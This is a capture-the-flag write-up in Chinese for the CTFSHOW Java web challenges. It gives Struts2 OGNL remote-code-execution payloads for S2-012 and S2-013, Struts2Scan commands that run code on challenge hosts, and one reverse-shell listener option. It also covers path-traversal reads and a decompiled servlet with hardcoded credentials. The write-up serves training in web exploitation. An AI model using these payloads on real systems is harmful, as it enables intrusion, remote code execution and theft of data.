Practice - CTFSHOW WEB入门 JAVA篇

web279-web283

脚本一键利用 https://github.com/wyzmgmdg/Struts2Scan

web284

Struts-S2-012漏洞利用,参考文章构造 payload
%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"env"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

web285

参考文章Struts-S2-013漏洞利用构造 payload,或利用工具 Struts2-Scan 一键利用。
payload: /S2-013/link.action?url=%24%7B(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('env').getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println(%23d)%2C%23out.close())%7D

web286-web288

脚本,–exec 显示不完整就弹 shell。

web289

1
2
$ python .\Struts2Scan.py -u http://6cc667dc-21e1-47f6-bc20-7c86de46d293.challenge.ctf.show/S2-029/default.action?message=aaaaa -n S2-032 --exec
>> env

web290

1
2
$ python .\Struts2Scan.py -u http://472b9395-a127-4f0b-9dbc-c9d19bf93912.challenge.ctf.show/S2-032/memoshow.action?id=3 -n S2-045 --exec
>> env

web291

1
2
$ python .\Struts2Scan.py -u http://b7828e36-6040-474a-8d74-5b2e47e9d225.challenge.ctf.show/S2-033/orders -n S2-045 --exec
>> env

web292

1
2
$ python .\Struts2Scan.py -u http://36034b6f-491f-4b59-8281-ede2349302ff.challenge.ctf.show/S2-037/orders -n S2-045 --exec
>> env

web293

1
2
$ python .\Struts2Scan.py -u http://474f4f6b-8ae7-42c0-bb45-9e1cf63bd17a.challenge.ctf.show/S2-045/orders -n S2-045 --exec
>> env

web294

1
2
$ python .\Struts2Scan.py -u http://79931272-f07a-41a3-8608-ec19106644c3.challenge.ctf.show/S2-046/doUpload.action -n S2-046 --exec
>> env

提示不存在可忽略

web295

1
$ python .\Struts2Scan.py -u http://d8a2ded0-0c5d-4a17-846a-5ae627dd1468.challenge.ctf.show/S2-048/integration/saveGangster.action -d "name={exp}&age=11111&description=aaaa" -n S2-048 -lr x.x.x.x:9999

web296

1
2
$ python .\Struts2Scan.py -u http://770a3f17-692b-4558-aebe-838df182ff9c.challenge.ctf.show/S2-052/orders -n S2-045 --exec
>> env

web297

1
2
$ python .\Struts2Scan.py -u http://7545e434-5ce5-4cd7-8d62-2da3276d6cf3.challenge.ctf.show/S2-053/?name=VulApps -n S2-045 --exec
>> env

web298

jadx 反编译给的 war 包里面的 class。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
package com.ctfshow.servlet;

import com.ctfshow.model.User;
import com.ctfshow.util.Util;
import java.io.IOException;
import java.io.PrintWriter;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

public class loginServlet extends HttpServlet {
private static final long serialVersionUID = -3044593499093610703L;

public void destroy() {
loginServlet.super.destroy();
}

public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
response.setContentType("text/html");
PrintWriter out = response.getWriter();
String username = request.getParameter("username");
User user = new User(username, request.getParameter("password"));
if (username == "admin") {
out.print("you are not admin");
} else if (user.getVipStatus()) {
out.print("you are login");
out.print(Util.readFlag("/flag"));
} else {
out.print("login failed");
}
out.flush();
out.close();
}

public void init() throws ServletException {
}
}

user model

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
package com.ctfshow.model;

import java.io.Serializable;

public class User implements Serializable {
private static final long serialVersionUID = -4069265999830231626L;
private Boolean isVip;
private String password;
private String username;

public String getUsername() {
return this.username;
}

public void setUsername(String username2) {
this.username = username2;
}

public String getPassword() {
return this.password;
}

public void setPassword(String password2) {
this.password = password2;
}

public Boolean getIvVip() {
return this.isVip;
}

public void setIvVip(Boolean ivVip) {
this.isVip = ivVip;
}

public User(String username2, String password2) {
this.username = username2;
this.password = password2;
}

public boolean getVipStatus() {
if (!this.username.equals("admin") || !this.password.equals("ctfshow")) {
return false;
}
return true;
}

public String toString() {
return "User [username=" + this.username + ", password=" + this.password + ", isVip=" + this.isVip + "]";
}
}

根据源码构造 payload: /ctfshow/login?username=admin&password=ctfshow

web299

html 注释 /view-source?file=index.php,读取 WEB-INF/web.xml 有 com.ctfshow.servlet.GetFlag,读 WEB-INF/classes/com/ctfshow/servlet/GetFlag.class 内有 flag 路径 /fl3g,读 ../../../../../../fl3g 得 flag。
尝试过读 class 下载进行反编译,无果。
payload: /view-source?file=../../../../../../fl3g

web300

同上题。
payload: /?file=../../../../../f1bg